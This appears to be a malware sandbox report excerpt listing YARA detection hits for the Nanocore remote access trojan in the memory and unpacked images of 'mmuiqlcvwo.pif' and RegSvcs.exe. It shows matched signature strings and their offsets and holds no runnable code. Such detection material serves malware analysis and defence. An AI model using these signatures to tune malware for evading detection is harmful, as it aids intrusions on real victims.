Process Memory Space: mmuiqlcvwo.pif PID: 5828	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1b1ec:$x1: NanoCore.ClientPluginHost 0x1b229:$x2: IClientNetworkHost 0x1ece7:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x29d6d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x36287:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x415ea:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x514aa:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5c9df:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x72f3b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7e5e1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x89825:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x94b88:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xb1f95:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x195678:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x39b2e6:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3a6649:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3b1c8f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3d41a1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3df3e2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3ea62e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3f5901:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: mmuiqlcvwo.pif PID: 5828	JoeSecurity_AntiVM_1	Yara detected AntiVM autoit script	Joe Security
Process Memory Space: mmuiqlcvwo.pif PID: 5828	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: mmuiqlcvwo.pif PID: 5828	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1aedc:$a: NanoCore 0x1aeec:$a: NanoCore 0x1af91:$a: NanoCore 0x1afa0:$a: NanoCore 0x1b198:$a: NanoCore 0x1b1ac:$a: NanoCore 0x1b1ec:$a: NanoCore 0x263d7:$a: NanoCore 0x263e9:$a: NanoCore 0x26425:$a: NanoCore 0x328f1:$a: NanoCore 0x32903:$a: NanoCore 0x3293f:$a: NanoCore 0x3dc54:$a: NanoCore 0x3dc66:$a: NanoCore 0x3dca2:$a: NanoCore 0x4db14:$a: NanoCore 0x4db26:$a: NanoCore 0x4db62:$a: NanoCore 0x59049:$a: NanoCore 0x5905b:$a: NanoCore
Process Memory Space: RegSvcs.exe PID: 6240	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x27d42:$x1: NanoCore.ClientPluginHost 0x27d5c:$x2: IClientNetworkHost 0x5b1d4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x65cce:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegSvcs.exe PID: 6240	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6240	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x27cac:$a: NanoCore 0x27d05:$a: NanoCore 0x27d42:$a: NanoCore 0x27dbb:$a: NanoCore 0x284ab:$a: NanoCore 0x284fe:$a: NanoCore 0x28537:$a: NanoCore 0x285aa:$a: NanoCore 0x2f9b5:$a: NanoCore 0x2f9c8:$a: NanoCore 0x2f9fa:$a: NanoCore 0x350e9:$a: NanoCore 0x3569b:$a: NanoCore 0x356ae:$a: NanoCore 0x356e0:$a: NanoCore 0x556a3:$a: NanoCore 0x57d6c:$a: NanoCore 0x57db2:$a: NanoCore 0x57dc1:$a: NanoCore 0x62338:$a: NanoCore 0x6234a:$a: NanoCore
Click to see the 54 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.2.RegSvcs.exe.6290000.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
14.2.RegSvcs.exe.6290000.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
14.2.RegSvcs.exe.6290000.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.RegSvcs.exe.4834d2d.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x241f8:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x24225:$x2: IClientNetworkHost
14.2.RegSvcs.exe.4834d2d.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x241f8:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x252d3:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x24212:$s5: IClientLoggingHost
14.2.RegSvcs.exe.4834d2d.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.RegSvcs.exe.6290000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
14.2.RegSvcs.exe.6290000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
14.2.RegSvcs.exe.6290000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.43c9268.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.43c9268.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.43c9268.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.43c9268.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.RegSvcs.exe.6294629.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
14.2.RegSvcs.exe.6294629.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
14.2.RegSvcs.exe.6294629.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.2.RegSvcs.exe.60f0000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
14.2.RegSvcs.exe.60f0000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.442ee78.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.442ee78.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.442ee78.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.442ee78.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.RegSvcs.exe.3834f58.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
14.2.RegSvcs.exe.3834f58.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
14.2.RegSvcs.exe.1300000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.RegSvcs.exe.1300000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.RegSvcs.exe.1300000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.RegSvcs.exe.1300000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.2.RegSvcs.exe.4830704.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28821:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x2884e:$x2: IClientNetworkHost
14.2.RegSvcs.exe.4830704.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28821:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x298fc:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x2883b:$s5: IClientLoggingHost
14.2.RegSvcs.exe.4830704.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.43c9268.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.43c9268.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.43c9268.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.43c9268.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
8.3.mmuiqlcvwo.pif.43c9268.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.43c9268.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.43c9268.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.43c9268.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.RegSvcs.exe.482b8ce.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d657:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d684:$x2: IClientNetworkHost
14.2.RegSvcs.exe.482b8ce.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d657:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e732:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d671:$s5: IClientLoggingHost
14.2.RegSvcs.exe.482b8ce.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.RegSvcs.exe.482b8ce.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x1de4b:$a: NanoCore 0x2d60d:$a: NanoCore 0x2d622:$a: NanoCore 0x2d657:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d3c9:$b: ClientPlugin
14.2.RegSvcs.exe.4830704.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
14.2.RegSvcs.exe.4830704.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
14.2.RegSvcs.exe.4830704.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
8.3.mmuiqlcvwo.pif.4363658.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.4363658.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.4363658.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.3.mmuiqlcvwo.pif.4363658.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
